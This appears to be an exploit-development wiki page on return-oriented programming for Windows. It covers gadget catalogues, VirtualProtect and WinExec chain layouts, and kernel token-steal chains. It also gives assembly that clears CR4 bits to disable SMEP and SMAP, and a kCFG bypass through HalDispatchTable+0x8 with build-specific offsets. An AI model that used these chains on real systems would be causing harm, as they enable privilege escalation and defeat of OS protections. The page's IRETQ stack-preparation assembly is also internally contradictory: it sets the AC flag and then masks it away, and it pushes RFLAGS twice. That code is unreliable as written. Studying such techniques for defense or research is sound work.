Return-Oriented Programming (ROP)
Last updated: 2026-04-11
Related: Mitigations, Mitigations, Primitives, Use After Free, Reversing
Tags:user-mode,kernel-mode,rop,dep-bypass
Summary
ROP (Return-Oriented Programming) is the primary technique for executing controlled computation after DEP/NX prevents traditional shellcode. Instead of injecting new code, ROP chains together short sequences of existing code ending in ret instructions (“gadgets”), redirected via a controlled stack. Modern exploitation on Windows almost universally requires ROP or its variants.
Core Concept
Normal stack: ROP stack:
[ret addr] [gadget1 addr] ← pops to RIP, executes gadget1, hits ret
[locals] [gadget1 arg] ← if gadget pops from stack
[gadget2 addr] ← next ret lands here
[gadget2 arg]
...
[VirtualProtect] ← often used to mark shellcode exec
[arg1]
[arg2]
[arg3]
[shellcode addr]
Gadget Types
Essential Gadget Categories
| Type | Example | Purpose |
|---|---|---|
| Load register | pop rax ; ret | Set register to constant |
| Move register | mov rax, rbx ; ret | Copy between registers |
| Write memory | mov [rax], rbx ; ret | Store value |
| Read memory | mov rax, [rbx] ; ret | Load value |
| Arithmetic | add rax, rbx ; ret | Compute addresses |
| Pivot | xchg rsp, rax ; ret | Redirect stack to attacker data |
| Call | call rbx ; ret (or jmp) | Invoke function |
Stack Pivot Gadgets
Essential when stack is not controlled but another register points to attacker data:
xchg rsp, rax ; ret ; RSP = RAX
add rsp, N ; ret ; skip over stack data to controlled region
mov rsp, [rbx+N] ; ret ; load stack pointer from memory
leave ; ret ; mov rsp,rbp; pop rbp — useful for frame-based pivot
Gadget Hunting
Tools
- ROPgadget (
ROPgadget --binary target.exe --rop) - ropper (
ropper -f target.exe) - rp++ (fast, supports PE/ELF/MachO)
- mona.py (WinDbg plugin, excellent for exploit dev)
- pwntools ROP module (automated chain generation)
Finding Gadgets in Loaded Modules
# Using pwntools
from pwn import *
elf = ELF("ntdll.dll")
rop = ROP(elf)
rop.find_gadget(['pop rdi', 'ret'])
Key Modules for Windows ROP
- ntdll.dll: always loaded, large, unprotected, base often leaked
- kernel32.dll: VirtualProtect, VirtualAlloc
- kernelbase.dll: wide API surface
- msvcrXX.dll: CRT gadgets
- ntoskrnl.exe: for kernel ROP chains
Windows-Specific ROP Patterns
VirtualProtect Chain (Classic User-Mode)
Mark shellcode page executable:
[pop rcx ; ret] RCX = shellcode address
[shellcode_addr]
[pop rdx ; ret] RDX = size
[0x1000]
[pop r8 ; ret] R8 = PAGE_EXECUTE_READWRITE (0x40)
[0x40]
[pop r9 ; ret] R9 = &OldProtect (writable address)
[writable_addr]
[VirtualProtect addr] call VirtualProtect
[shellcode addr] after return, jump to shellcode
WinExec / CreateProcess Chain
If shellcode injection is blocked (ACG), call system commands:
[pop rcx ; ret]
[cmd_string_addr] "cmd.exe /c calc"
[WinExec addr]
Kernel ROP (Token Steal)
In kernel space, chains typically:
- Set up registers for token steal shellcode logic
- Call
PsLookupProcessByProcessIdequivalent via gadgets - Modify
_EPROCESS.Tokenvia memory write gadget - Return to
IRQL_GT_ZERO_AT_SYSTEM_SERVICEor similar to restore kernel state
IRETQ Kernel Entry Frame (LSTAR Overwrite / WRMSR Exploit Class)
When LSTAR is overwritten to point at a ROP gadget (or the entry point of a kernel-mode trampoline), the CPU begins executing in ring 0 but with user-mode context: user GS, user RSP, user CR3. To restore full kernel context and continue a ROP chain safely, the standard sequence is:
Gadget 1: swapgs; iretq
swapgs: swaps GS (user TEB) ↔ kernel KPCR — required before any kernel structure accessiretq: performs privileged return — pops RIP, CS, RFLAGS, RSP, SS from the stack in order
IRETQ stack frame layout (must be prepared before syscall):
[ RIP ] ← pointer to gadget 2 (top of stack at IRETQ)
[ CS ] = 0x10 (kernel code segment)
[ RFLAGS ] = current RFLAGS with AC=1 (SMAP disabled), interrupts off
[ RSP ] = current RSP (IRETQ pops this into RSP; the subsequent CR4 gadget's `pop rbx` removes it)
[ SS ] = 0x18 (kernel stack segment, last/deepest)
Stack preparation assembly (reading bottom-up; syscall pops toward top):
; Prepare RFLAGS with SMAP disabled, interrupts off
pushfq
pop rbx
or rbx, 0x40000 ; AC bit — disable SMAP
and rbx, 0FFh ; keep interrupt flag cleared
push rbx ; RFLAGS for iretq
pushfq ; also update live RFLAGS now (disable SMAP before syscall)
popfq
mov rbx, 0x18
push rbx ; SS
push rsp ; RSP (CR4 gadget's pop rbx will consume this)
push rbx_with_rflags ; RFLAGS
mov rbx, 0x10
push rbx ; CS
push gadget2_addr ; RIP (top of stack for iretq)
syscall ; CPU → ring 0, RSP still user-space, jumps to LSTAR → gadget1
Gadget 2: CR4 manipulation (to disable SMEP):
mov cr4, rax ; RAX = hardcoded CR4 value with bits 20+21 cleared (SMEP/SMAP off)
add rsp, 0x20 ; skip shadow space
pop rbx ; consume the RSP pushed in IRETQ frame
ret ; → shellcode
Stack alignment: IRETQ requires 16-byte stack alignment. Add sub rsp, 16 / mask before pushing IRETQ frame.
Return to user-mode (swapgs; sysret): After shellcode payload completes, return to user-mode using a swapgs; sysret gadget:
sysretloads RIP from RCX (must be set to return address in user-mode caller)sysretloads RFLAGS from R11 (must be set to original user RFLAGS)sysretdoes NOT modify RSP — must manually restore RSP to user-mode stack stateswapgsbeforesysretrestores user GS
; In shellcode, before returning:
add rsp, 0x18 ; restore stack past leftover IRETQ frame remnants
pop rcx ; RCX = return address (return to main())
mov rax, ORIGINAL_CR4 ; restore SMEP
sub rsp, 0x28
push gadget_swapgs_sysret ; CR4 gadget will ret into here
; ... set up CR4 gadget args in rax ...
mov r11, r12 ; r12 = original RFLAGS saved before syscall
ret ; → CR4 restore gadget → swapgs; sysret → user-mode
Key: save original RFLAGS to a callee-saved register (e.g., R12) before calling syscall. R12 is preserved across the ROP chain. Restore it to R11 just before sysret.
Kernel ROP for kCFG Bypass (HalDispatchTable+0x8 Pattern)
Without HVCI, kCFG only checks that the indirect call destination is in kernel address space (top bit set). Overwriting HalDispatchTable+0x8 with a kernel jmp <reg> gadget passes this check while redirecting execution to a user-controlled register:
1. Pre-load shellcode address into a callee-preserved register (R13-R15, RSI)
via a user-mode assembly stub before the kernel dispatch.
2. Overwrite HalDispatchTable+0x8 (offset 0xc00a68 from ntoskrnl base on Win10 22H2)
with address of "jmp r13" gadget (rp++ against ntoskrnl.exe: 0x80d5db offset).
3. Call NtQueryIntervalProfile(2, &dummy) — triggers indirect call through HalDispatchTable+0x8.
4. kCFG check: target is kernel address ✓ → jmp r13 executes → control → shellcode.
Key: R13/R14/R15/RSI survive unmodified from NtQueryIntervalProfile entry through to the HaliQuerySystemInformation dispatch point. This can be verified/confirmed per-target by breakpointing both functions and checking register state.
See Mitigations §kCFG Bypass for full code.
CFG-Aware ROP (Modern Windows)
CFG restricts indirect calls — call [reg]. Direct ret gadgets are not checked. However:
- CFG checks
__guard_check_icall_fptrbefore indirect calls - Some gadgets containing indirect calls won’t work if CFG is strict
CFG-Compliant ROP Strategy
- Find gadgets that don’t use indirect calls (only
ret, directcall, directjmp) - Use
ret2libc— call imported functions via their address in IAT (these are valid CFG targets as they’re export addresses) - Find “trampoline” gadgets:
jmp [rax]where rax points to a valid CFG target
CET Bypass Implications
CET shadow stack invalidates return-address overwrites. Approaches:
- JOP (Jump-Oriented Programming): dispatch via
jmpinstead ofret; no shadow stack interaction forjmp. Requires IBT bypass too if enabled. - ENDBR gadget chains: all gadgets must start with
ENDBR64when IBT is active - longjmp abuse:
_longjmprestores RSP and RBX — if you can corruptjmp_buf, you control next execution point
Practical ROP Development Workflow
- Identify control point: where do you control RIP? (ret addr, vtable, function pointer)
- Determine constraints: which modules are loaded, are they CFG-enabled, is CET active?
- Find stack pivot: if RSP doesn’t point to controlled data, find pivot gadget
- Build chain manually or with tool: match calling convention (x64 Windows: RCX, RDX, R8, R9, stack)
- Handle ASLR: either use fixed-base module or have info leak for dynamic base
- Test incrementally: single-step through gadgets in debugger
Anti-ROP Techniques to Bypass
| Defense | Bypass |
|---|---|
| CFG | Use ret-only gadgets + valid indirect call targets |
| CET Shadow Stack | JOP, longjmp corruption |
| Stack canary | Need canary leak; or avoid stack overflow, use other control flow |
| SafeSEH/SEHOP | Don’t use SEH overwrite; or use 64-bit exception model |
Exploit Relevance
ROP is used in essentially every modern Windows exploit that doesn’t rely solely on data-only attack. It is the backbone technique enabling DEP bypass, and its interaction with CFG/CET defines the complexity of modern exploit chains.
References
- “Return-Oriented Programming” — Hovav Shacham (original paper)
- “Windows Exploitation in 2019” — various Project Zero posts
- mona.py documentation — Corelan Team
- “ROP Chains on Windows x64” — Corelan Team
- “Bypassing CET with ROP” — Alex Plaskett
